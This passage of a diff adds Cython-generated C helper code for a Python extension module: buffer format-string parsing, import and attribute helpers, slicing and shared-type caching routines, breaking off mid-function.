+ return PySequence_SetItem(o, i, v); + } +#endif + return __Pyx_SetItemInt_Generic(o, PyInt_FromSsize_t(i), v); +} + +/* RaiseUnboundLocalError */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { + PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); +} + +/* DivInt[long] */ +static CYTHON_INLINE long __Pyx_div_long(long a, long b) { + long q = a / b; + long r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__2); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* IsLittleEndian */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void) +{ + union { + uint32_t u32; + uint8_t u8[4]; + } S; + S.u32 = 0x01020304; + return S.u8[0] == 4; +} + +/* BufferFormatCheck */ +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type) { + stack[0].field = &ctx->root; + stack[0].parent_offset = 0; + ctx->root.type = type; + ctx->root.name = "buffer dtype"; + ctx->root.offset = 0; + ctx->head = stack; + ctx->head->field = &ctx->root; + ctx->fmt_offset = 0; + ctx->head->parent_offset = 0; + ctx->new_packmode = '@'; + ctx->enc_packmode = '@'; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->is_complex = 0; + ctx->is_valid_array = 0; + ctx->struct_alignment = 0; + while (type->typegroup == 'S') { + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = 0; + type = type->fields->type; + } +} +static int __Pyx_BufFmt_ParseNumber(const char** ts) { + int count; + const char* t = *ts; + if (*t < '0' || *t > '9') { + return -1; + } else { + count = *t++ - '0'; + while (*t >= '0' && *t <= '9') { + count *= 10; + count += *t++ - '0'; + } + } + *ts = t; + return count; +} +static int __Pyx_BufFmt_ExpectNumber(const char **ts) { + int number = __Pyx_BufFmt_ParseNumber(ts); + if (number == -1) + PyErr_Format(PyExc_ValueError,\ + "Does not understand character buffer dtype format string ('%c')", **ts); + return number; +} +static void __Pyx_BufFmt_RaiseUnexpectedChar(char ch) { + PyErr_Format(PyExc_ValueError, + "Unexpected format string character: '%c'", ch); +} +static const char* __Pyx_BufFmt_DescribeTypeChar(char ch, int is_complex) { + switch (ch) { + case '?': return "'bool'"; + case 'c': return "'char'"; + case 'b': return "'signed char'"; + case 'B': return "'unsigned char'"; + case 'h': return "'short'"; + case 'H': return "'unsigned short'"; + case 'i': return "'int'"; + case 'I': return "'unsigned int'"; + case 'l': return "'long'"; + case 'L': return "'unsigned long'"; + case 'q': return "'long long'"; + case 'Q': return "'unsigned long long'"; + case 'f': return (is_complex ? "'complex float'" : "'float'"); + case 'd': return (is_complex ? "'complex double'" : "'double'"); + case 'g': return (is_complex ? "'complex long double'" : "'long double'"); + case 'T': return "a struct"; + case 'O': return "Python object"; + case 'P': return "a pointer"; + case 's': case 'p': return "a string"; + case 0: return "end"; + default: return "unparsable format string"; + } +} +static size_t __Pyx_BufFmt_TypeCharToStandardSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return 2; + case 'i': case 'I': case 'l': case 'L': return 4; + case 'q': case 'Q': return 8; + case 'f': return (is_complex ? 8 : 4); + case 'd': return (is_complex ? 16 : 8); + case 'g': { + PyErr_SetString(PyExc_ValueError, "Python does not define a standard format string size for long double ('g').."); + return 0; + } + case 'O': case 'P': return sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static size_t __Pyx_BufFmt_TypeCharToNativeSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(short); + case 'i': case 'I': return sizeof(int); + case 'l': case 'L': return sizeof(long); + #ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(PY_LONG_LONG); + #endif + case 'f': return sizeof(float) * (is_complex ? 2 : 1); + case 'd': return sizeof(double) * (is_complex ? 2 : 1); + case 'g': return sizeof(long double) * (is_complex ? 2 : 1); + case 'O': case 'P': return sizeof(void*); + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +typedef struct { char c; short x; } __Pyx_st_short; +typedef struct { char c; int x; } __Pyx_st_int; +typedef struct { char c; long x; } __Pyx_st_long; +typedef struct { char c; float x; } __Pyx_st_float; +typedef struct { char c; double x; } __Pyx_st_double; +typedef struct { char c; long double x; } __Pyx_st_longdouble; +typedef struct { char c; void *x; } __Pyx_st_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { char c; PY_LONG_LONG x; } __Pyx_st_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToAlignment(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_st_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_st_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_st_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_st_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_st_float) - sizeof(float); + case 'd': return sizeof(__Pyx_st_double) - sizeof(double); + case 'g': return sizeof(__Pyx_st_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_st_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +/* These are for computing the padding at the end of the struct to align + on the first member of the struct. This will probably the same as above, + but we don't have any guarantees. + */ +typedef struct { short x; char c; } __Pyx_pad_short; +typedef struct { int x; char c; } __Pyx_pad_int; +typedef struct { long x; char c; } __Pyx_pad_long; +typedef struct { float x; char c; } __Pyx_pad_float; +typedef struct { double x; char c; } __Pyx_pad_double; +typedef struct { long double x; char c; } __Pyx_pad_longdouble; +typedef struct { void *x; char c; } __Pyx_pad_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { PY_LONG_LONG x; char c; } __Pyx_pad_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToPadding(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_pad_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_pad_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_pad_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_pad_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_pad_float) - sizeof(float); + case 'd': return sizeof(__Pyx_pad_double) - sizeof(double); + case 'g': return sizeof(__Pyx_pad_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_pad_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static char __Pyx_BufFmt_TypeCharToGroup(char ch, int is_complex) { + switch (ch) { + case 'c': + return 'H'; + case 'b': case 'h': case 'i': + case 'l': case 'q': case 's': case 'p': + return 'I'; + case '?': case 'B': case 'H': case 'I': case 'L': case 'Q': + return 'U'; + case 'f': case 'd': case 'g': + return (is_complex ? 'C' : 'R'); + case 'O': + return 'O'; + case 'P': + return 'P'; + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +static void __Pyx_BufFmt_RaiseExpected(__Pyx_BufFmt_Context* ctx) { + if (ctx->head == NULL || ctx->head->field == &ctx->root) { + const char* expected; + const char* quote; + if (ctx->head == NULL) { + expected = "end"; + quote = ""; + } else { + expected = ctx->head->field->type->name; + quote = "'"; + } + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected %s%s%s but got %s", + quote, expected, quote, + __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex)); + } else { + __Pyx_StructField* field = ctx->head->field; + __Pyx_StructField* parent = (ctx->head - 1)->field; + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected '%s' but got %s in '%s.%s'", + field->type->name, __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex), + parent->type->name, field->name); + } +} +static int __Pyx_BufFmt_ProcessTypeChunk(__Pyx_BufFmt_Context* ctx) { + char group; + size_t size, offset, arraysize = 1; + if (ctx->enc_type == 0) return 0; + if (ctx->head->field->type->arraysize[0]) { + int i, ndim = 0; + if (ctx->enc_type == 's' || ctx->enc_type == 'p') { + ctx->is_valid_array = ctx->head->field->type->ndim == 1; + ndim = 1; + if (ctx->enc_count != ctx->head->field->type->arraysize[0]) { + PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %zu", + ctx->head->field->type->arraysize[0], ctx->enc_count); + return -1; + } + } + if (!ctx->is_valid_array) { + PyErr_Format(PyExc_ValueError, "Expected %d dimensions, got %d", + ctx->head->field->type->ndim, ndim); + return -1; + } + for (i = 0; i < ctx->head->field->type->ndim; i++) { + arraysize *= ctx->head->field->type->arraysize[i]; + } + ctx->is_valid_array = 0; + ctx->enc_count = 1; + } + group = __Pyx_BufFmt_TypeCharToGroup(ctx->enc_type, ctx->is_complex); + do { + __Pyx_StructField* field = ctx->head->field; + __Pyx_TypeInfo* type = field->type; + if (ctx->enc_packmode == '@' || ctx->enc_packmode == '^') { + size = __Pyx_BufFmt_TypeCharToNativeSize(ctx->enc_type, ctx->is_complex); + } else { + size = __Pyx_BufFmt_TypeCharToStandardSize(ctx->enc_type, ctx->is_complex); + } + if (ctx->enc_packmode == '@') { + size_t align_at = __Pyx_BufFmt_TypeCharToAlignment(ctx->enc_type, ctx->is_complex); + size_t align_mod_offset; + if (align_at == 0) return -1; + align_mod_offset = ctx->fmt_offset % align_at; + if (align_mod_offset > 0) ctx->fmt_offset += align_at - align_mod_offset; + if (ctx->struct_alignment == 0) + ctx->struct_alignment = __Pyx_BufFmt_TypeCharToPadding(ctx->enc_type, + ctx->is_complex); + } + if (type->size != size || type->typegroup != group) { + if (type->typegroup == 'C' && type->fields != NULL) { + size_t parent_offset = ctx->head->parent_offset + field->offset; + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = parent_offset; + continue; + } + if ((type->typegroup == 'H' || group == 'H') && type->size == size) { + } else { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + } + offset = ctx->head->parent_offset + field->offset; + if (ctx->fmt_offset != offset) { + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch; next field is at offset %" CYTHON_FORMAT_SSIZE_T "d but %" CYTHON_FORMAT_SSIZE_T "d expected", + (Py_ssize_t)ctx->fmt_offset, (Py_ssize_t)offset); + return -1; + } + ctx->fmt_offset += size; + if (arraysize) + ctx->fmt_offset += (arraysize - 1) * size; + --ctx->enc_count; + while (1) { + if (field == &ctx->root) { + ctx->head = NULL; + if (ctx->enc_count != 0) { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + break; + } + ctx->head->field = ++field; + if (field->type == NULL) { + --ctx->head; + field = ctx->head->field; + continue; + } else if (field->type->typegroup == 'S') { + size_t parent_offset = ctx->head->parent_offset + field->offset; + if (field->type->fields->type == NULL) continue; + field = field->type->fields; + ++ctx->head; + ctx->head->field = field; + ctx->head->parent_offset = parent_offset; + break; + } else { + break; + } + } + } while (ctx->enc_count); + ctx->enc_type = 0; + ctx->is_complex = 0; + return 0; +} +static PyObject * +__pyx_buffmt_parse_array(__Pyx_BufFmt_Context* ctx, const char** tsp) +{ + const char *ts = *tsp; + int i = 0, number, ndim; + ++ts; + if (ctx->new_count != 1) { + PyErr_SetString(PyExc_ValueError, + "Cannot handle repeated arrays in format string"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ndim = ctx->head->field->type->ndim; + while (*ts && *ts != ')') { + switch (*ts) { + case ' ': case '\f': case '\r': case '\n': case '\t': case '\v': continue; + default: break; + } + number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + if (i < ndim && (size_t) number != ctx->head->field->type->arraysize[i]) + return PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %d", + ctx->head->field->type->arraysize[i], number); + if (*ts != ',' && *ts != ')') + return PyErr_Format(PyExc_ValueError, + "Expected a comma in format string, got '%c'", *ts); + if (*ts == ',') ts++; + i++; + } + if (i != ndim) + return PyErr_Format(PyExc_ValueError, "Expected %d dimension(s), got %d", + ctx->head->field->type->ndim, i); + if (!*ts) { + PyErr_SetString(PyExc_ValueError, + "Unexpected end of format string, expected ')'"); + return NULL; + } + ctx->is_valid_array = 1; + ctx->new_count = 1; + *tsp = ++ts; + return Py_None; +} +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts) { + int got_Z = 0; + while (1) { + switch(*ts) { + case 0: + if (ctx->enc_type != 0 && ctx->head == NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + if (ctx->head != NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + return ts; + case ' ': + case '\r': + case '\n': + ++ts; + break; + case '<': + if (!__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Little-endian buffer not supported on big-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '>': + case '!': + if (__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Big-endian buffer not supported on little-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '=': + case '@': + case '^': + ctx->new_packmode = *ts++; + break; + case 'T': + { + const char* ts_after_sub; + size_t i, struct_count = ctx->new_count; + size_t struct_alignment = ctx->struct_alignment; + ctx->new_count = 1; + ++ts; + if (*ts != '{') { + PyErr_SetString(PyExc_ValueError, "Buffer acquisition: Expected '{' after 'T'"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + ctx->enc_count = 0; + ctx->struct_alignment = 0; + ++ts; + ts_after_sub = ts; + for (i = 0; i != struct_count; ++i) { + ts_after_sub = __Pyx_BufFmt_CheckString(ctx, ts); + if (!ts_after_sub) return NULL; + } + ts = ts_after_sub; + if (struct_alignment) ctx->struct_alignment = struct_alignment; + } + break; + case '}': + { + size_t alignment = ctx->struct_alignment; + ++ts; + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + if (alignment && ctx->fmt_offset % alignment) { + ctx->fmt_offset += alignment - (ctx->fmt_offset % alignment); + } + } + return ts; + case 'x': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->fmt_offset += ctx->new_count; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->enc_packmode = ctx->new_packmode; + ++ts; + break; + case 'Z': + got_Z = 1; + ++ts; + if (*ts != 'f' && *ts != 'd' && *ts != 'g') { + __Pyx_BufFmt_RaiseUnexpectedChar('Z'); + return NULL; + } + CYTHON_FALLTHROUGH; + case '?': case 'c': case 'b': case 'B': case 'h': case 'H': case 'i': case 'I': + case 'l': case 'L': case 'q': case 'Q': + case 'f': case 'd': case 'g': + case 'O': case 'p': + if ((ctx->enc_type == *ts) && (got_Z == ctx->is_complex) && + (ctx->enc_packmode == ctx->new_packmode) && (!ctx->is_valid_array)) { + ctx->enc_count += ctx->new_count; + ctx->new_count = 1; + got_Z = 0; + ++ts; + break; + } + CYTHON_FALLTHROUGH; + case 's': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_count = ctx->new_count; + ctx->enc_packmode = ctx->new_packmode; + ctx->enc_type = *ts; + ctx->is_complex = got_Z; + ++ts; + ctx->new_count = 1; + got_Z = 0; + break; + case ':': + ++ts; + while(*ts != ':') ++ts; + ++ts; + break; + case '(': + if (!__pyx_buffmt_parse_array(ctx, &ts)) return NULL; + break; + default: + { + int number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + ctx->new_count = (size_t)number; + } + } + } +} + +/* BufferGetAndValidate */ + static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info) { + if (unlikely(info->buf == NULL)) return; + if (info->suboffsets == __Pyx_minusones) info->suboffsets = NULL; + __Pyx_ReleaseBuffer(info); +} +static void __Pyx_ZeroBuffer(Py_buffer* buf) { + buf->buf = NULL; + buf->obj = NULL; + buf->strides = __Pyx_zeros; + buf->shape = __Pyx_zeros; + buf->suboffsets = __Pyx_minusones; +} +static int __Pyx__GetBufferAndValidate( + Py_buffer* buf, PyObject* obj, __Pyx_TypeInfo* dtype, int flags, + int nd, int cast, __Pyx_BufFmt_StackElem* stack) +{ + buf->buf = NULL; + if (unlikely(__Pyx_GetBuffer(obj, buf, flags) == -1)) { + __Pyx_ZeroBuffer(buf); + return -1; + } + if (unlikely(buf->ndim != nd)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + nd, buf->ndim); + goto fail; + } + if (!cast) { + __Pyx_BufFmt_Context ctx; + __Pyx_BufFmt_Init(&ctx, stack, dtype); + if (!__Pyx_BufFmt_CheckString(&ctx, buf->format)) goto fail; + } + if (unlikely((size_t)buf->itemsize != dtype->size)) { + PyErr_Format(PyExc_ValueError, + "Item size of buffer (%" CYTHON_FORMAT_SSIZE_T "d byte%s) does not match size of '%s' (%" CYTHON_FORMAT_SSIZE_T "d byte%s)", + buf->itemsize, (buf->itemsize > 1) ? "s" : "", + dtype->name, (Py_ssize_t)dtype->size, (dtype->size > 1) ? "s" : ""); + goto fail; + } + if (buf->suboffsets == NULL) buf->suboffsets = __Pyx_minusones; + return 0; +fail:; + __Pyx_SafeReleaseBuffer(buf); + return -1; +} + +/* UnicodeConcatInPlace */ + # if CYTHON_COMPILING_IN_CPYTHON && PY_MAJOR_VERSION >= 3 +static int +__Pyx_unicode_modifiable(PyObject *unicode) +{ + if (Py_REFCNT(unicode) != 1) + return 0; + if (!PyUnicode_CheckExact(unicode)) + return 0; + if (PyUnicode_CHECK_INTERNED(unicode)) + return 0; + return 1; +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_ConcatInPlaceImpl(PyObject **p_left, PyObject *right + #if CYTHON_REFNANNY + , void* __pyx_refnanny + #endif + ) { + PyObject *left = *p_left; + Py_ssize_t left_len, right_len, new_len; + if (unlikely(__Pyx_PyUnicode_READY(left) == -1)) + return NULL; + if (unlikely(__Pyx_PyUnicode_READY(right) == -1)) + return NULL; + left_len = PyUnicode_GET_LENGTH(left); + if (left_len == 0) { + Py_INCREF(right); + return right; + } + right_len = PyUnicode_GET_LENGTH(right); + if (right_len == 0) { + Py_INCREF(left); + return left; + } + if (unlikely(left_len > PY_SSIZE_T_MAX - right_len)) { + PyErr_SetString(PyExc_OverflowError, + "strings are too large to concat"); + return NULL; + } + new_len = left_len + right_len; + if (__Pyx_unicode_modifiable(left) + && PyUnicode_CheckExact(right) + && PyUnicode_KIND(right) <= PyUnicode_KIND(left) + && !(PyUnicode_IS_ASCII(left) && !PyUnicode_IS_ASCII(right))) { + __Pyx_GIVEREF(*p_left); + if (unlikely(PyUnicode_Resize(p_left, new_len) != 0)) { + __Pyx_GOTREF(*p_left); + return NULL; + } + __Pyx_INCREF(*p_left); + _PyUnicode_FastCopyCharacters(*p_left, left_len, right, 0, right_len); + return *p_left; + } else { + return __Pyx_PyUnicode_Concat(left, right); + } + } +#endif + +/* SliceObject */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_GetSlice(PyObject* obj, + Py_ssize_t cstart, Py_ssize_t cstop, + PyObject** _py_start, PyObject** _py_stop, PyObject** _py_slice, + int has_cstart, int has_cstop, int wraparound) { + __Pyx_TypeName obj_type_name; +#if CYTHON_USE_TYPE_SLOTS + PyMappingMethods* mp; +#if PY_MAJOR_VERSION < 3 + PySequenceMethods* ms = Py_TYPE(obj)->tp_as_sequence; + if (likely(ms && ms->sq_slice)) { + if (!has_cstart) { + if (_py_start && (*_py_start != Py_None)) { + cstart = __Pyx_PyIndex_AsSsize_t(*_py_start); + if ((cstart == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; + } else + cstart = 0; + } + if (!has_cstop) { + if (_py_stop && (*_py_stop != Py_None)) { + cstop = __Pyx_PyIndex_AsSsize_t(*_py_stop); + if ((cstop == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; + } else + cstop = PY_SSIZE_T_MAX; + } + if (wraparound && unlikely((cstart < 0) | (cstop < 0)) && likely(ms->sq_length)) { + Py_ssize_t l = ms->sq_length(obj); + if (likely(l >= 0)) { + if (cstop < 0) { + cstop += l; + if (cstop < 0) cstop = 0; + } + if (cstart < 0) { + cstart += l; + if (cstart < 0) cstart = 0; + } + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + goto bad; + PyErr_Clear(); + } + } + return ms->sq_slice(obj, cstart, cstop); + } +#else + CYTHON_UNUSED_VAR(wraparound); +#endif + mp = Py_TYPE(obj)->tp_as_mapping; + if (likely(mp && mp->mp_subscript)) +#else + CYTHON_UNUSED_VAR(wraparound); +#endif + { + PyObject* result; + PyObject *py_slice, *py_start, *py_stop; + if (_py_slice) { + py_slice = *_py_slice; + } else { + PyObject* owned_start = NULL; + PyObject* owned_stop = NULL; + if (_py_start) { + py_start = *_py_start; + } else { + if (has_cstart) { + owned_start = py_start = PyInt_FromSsize_t(cstart); + if (unlikely(!py_start)) goto bad; + } else + py_start = Py_None; + } + if (_py_stop) { + py_stop = *_py_stop; + } else { + if (has_cstop) { + owned_stop = py_stop = PyInt_FromSsize_t(cstop); + if (unlikely(!py_stop)) { + Py_XDECREF(owned_start); + goto bad; + } + } else + py_stop = Py_None; + } + py_slice = PySlice_New(py_start, py_stop, Py_None); + Py_XDECREF(owned_start); + Py_XDECREF(owned_stop); + if (unlikely(!py_slice)) goto bad; + } +#if CYTHON_USE_TYPE_SLOTS + result = mp->mp_subscript(obj, py_slice); +#else + result = PyObject_GetItem(obj, py_slice); +#endif + if (!_py_slice) { + Py_DECREF(py_slice); + } + return result; + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is unsliceable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); +bad: + return NULL; +} + +/* PyObjectLookupSpecial */ + #if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error) { + PyObject *res; + PyTypeObject *tp = Py_TYPE(obj); +#if PY_MAJOR_VERSION < 3 + if (unlikely(PyInstance_Check(obj))) + return with_error ? __Pyx_PyObject_GetAttrStr(obj, attr_name) : __Pyx_PyObject_GetAttrStrNoError(obj, attr_name); +#endif + res = _PyType_Lookup(tp, attr_name); + if (likely(res)) { + descrgetfunc f = Py_TYPE(res)->tp_descr_get; + if (!f) { + Py_INCREF(res); + } else { + res = f(res, obj, (PyObject *)tp); + } + } else if (with_error) { + PyErr_SetObject(PyExc_AttributeError, attr_name); + } + return res; +} +#endif + +/* FixUpExtensionType */ + #if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* FetchSharedCythonModule */ + static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ + static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto 